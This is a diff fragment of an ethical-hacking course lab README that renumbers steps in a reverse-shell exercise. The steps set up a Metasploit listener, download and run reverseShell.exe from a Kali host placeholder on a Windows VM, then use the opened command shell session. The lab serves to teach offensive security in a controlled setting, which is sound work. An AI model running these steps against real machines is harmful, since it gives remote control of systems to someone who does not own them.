ufidon/eth/labs/lab06/README.md

     set LHOST 0.0.0.0
     exploit
     ```
-  - 2. Launch the reverse shell on the Windows machine 🪟
+  - 2.2.2.
+Launch the reverse shell on the Windows machine 🪟
     - open a browser, access http://Kali_IP/reverseShell.exe
     - download and run anyway
-  - 3. Go back to the previous Kali Linux VM 🐧 terminal
+  - 2.2.3.
+Go back to the previous Kali Linux VM 🐧 terminal
-    - a "command shell session" opens, run the following commands
+    - 1. "command shell session" opens, run the following commands
       ```cmd
-      # 1. view the processes you are using
+      # a. view the processes you are using
       tasklist /V /FI "IMAGENAME eq *shell*"
       ```